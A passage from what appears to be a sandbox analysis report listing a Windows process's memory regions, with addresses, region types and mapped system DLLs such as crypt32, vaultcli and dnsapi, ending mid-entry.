"\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 565 start_va = 0xa40000 end_va = 0xbc7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 566 start_va = 0x76df0000 end_va = 0x76e1afff monitored = 0 entry_point = 0x76df5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 567 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 568 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 569 start_va = 0xbd0000 end_va = 0xd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 570 start_va = 0xd60000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 571 start_va = 0x75960000 end_va = 0x76d5efff monitored = 0 entry_point = 0x75b1b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 572 start_va = 0x75540000 end_va = 0x75576fff monitored = 0 entry_point = 0x75543b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 573 start_va = 0x74820000 end_va = 0x74d18fff monitored = 0 entry_point = 0x74a27610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 574 start_va = 0x77420000 end_va = 0x7749afff monitored = 0 entry_point = 0x7743e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 575 start_va = 0x74df0000 end_va = 0x74e34fff monitored = 0 entry_point = 0x74e0de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 576 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 577 start_va = 0x77230000 end_va = 0x772bcfff monitored = 0 entry_point = 0x77279b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 578 start_va = 0x74e40000 end_va = 0x74e83fff monitored = 0 entry_point = 0x74e47410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 579 start_va = 0x75530000 end_va = 0x7553efff monitored = 0 entry_point = 0x75532e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 580 start_va = 0x71790000 end_va = 0x717a2fff monitored = 0 entry_point = 0x71799950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 581 start_va = 0x70680000 end_va = 0x706aefff monitored = 0 entry_point = 0x706995e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 582 start_va = 0x71ad0000 end_va = 0x71aeafff monitored = 0 entry_point = 0x71ad9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 583 start_va = 0x2160000 end_va = 0x2496fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 584 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 585 start_va = 0x70320000 end_va = 0x70359fff monitored = 0 entry_point = 0x70339be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 586 start_va = 0x70250000 end_va = 0x70317fff monitored = 0 entry_point = 0x702bae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 587 start_va = 0x75090000 end_va = 0x75207fff monitored = 0 entry_point = 0x750e8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 588 start_va = 0x76d60000 end_va = 0x76d6dfff monitored = 0 entry_point = 0x76d65410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 589 start_va = 0x70ab0000 end_va = 0x70ab7fff monitored = 0 entry_point = 0x70ab1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 590 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 591 start_va = 0x570000 end_va = 0x616fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 592 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 593 start_va = 0x76dd0000 end_va = 0x76de2fff monitored = 0 entry_point = 0x76dd1d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 594 start_va = 0x70190000 end_va = 0x701a4fff monitored = 0 entry_point = 0x70195210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 595 start_va = 0x70170000 end_va = 0x70182fff monitored = 0 entry_point = 0x70175c60 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 596 start_va = 0x70150000 end_va = 0x70168fff monitored = 0 entry_point = 0x701547e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 597 start_va = 0x71990000 end_va = 0x719defff monitored = 0 entry_point = 0x7199d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 598 start_va = 0x70fe0000 end_va = 0x71063fff monitored = 0 entry_point = 0x71006530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 599 start_va = 0x74d80000 end_va = 0x74d86fff monitored = 0 entry_point = 0x74d81e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 600 start_va = 0x71a80000 end_va = 0x71aaefff monitored = 0 entry_point = 0x71a8bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 601 start_va = 0x70ba0000 end_va = 0x70be6fff monitored = 0 entry_point = 0x70bb58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 602 start_va = 0x70b90000 end_va = 0x70b97fff monitored = 0 entry_point = 0x70b91920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 603 start_va = 0x4f0000 end_va = 0x4f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 604 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 605 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 606 start_va = 0x8e0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 607 start_va = 0xa30000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 608 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 609 start_va = 0x8e0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 610 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 611 start_va = 0x24a0000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 612 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 613 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 614 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 615 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 616 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 617 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 618 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 619 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 620 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 621 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 622 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 623 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 624 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 625 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 626 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 627 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 628 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 629 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 630 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 631 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 632 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 633 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 634 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 635 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 636 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 637 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 638 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 639 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 640 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 641 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 642 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 643 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 644 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 645 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 646 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 647 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 648 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 649 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 650 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 651 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 652 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 653 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 654 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 655 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 656 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 657 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 658 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 659 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 660 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 661 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 662 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 663 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 664 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 665 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 666 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 667 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 668 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 669 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 670 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 671 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 672 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 673 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 674 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 675 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 676 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 677 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 678 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 679 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 680 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 681 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 682 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 683 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 684 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 685 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 686 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 687 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 688 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 689 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 690 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 691 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 692 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 693 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 694 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 695 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 696 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 697 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 698 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 699 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 700 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 701 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 702 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 703 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 704 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 705 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 706 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 707 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 708 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 709 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 710 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 711 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 712 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 713 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 714 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 715 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 716 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 717 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 718 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 719 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 720 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 721 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 722 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 723 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 724 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 725 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 726 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 727 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 728 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 729 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 730 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 731 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 732 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 733 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 734 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 735 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 736 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 737 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 738 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 739 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 740 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 741 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 742 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 743 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 744 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 745 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 746 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 747 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 748 start_va = 0x4b0000 end_va = 0x4effff monitored = 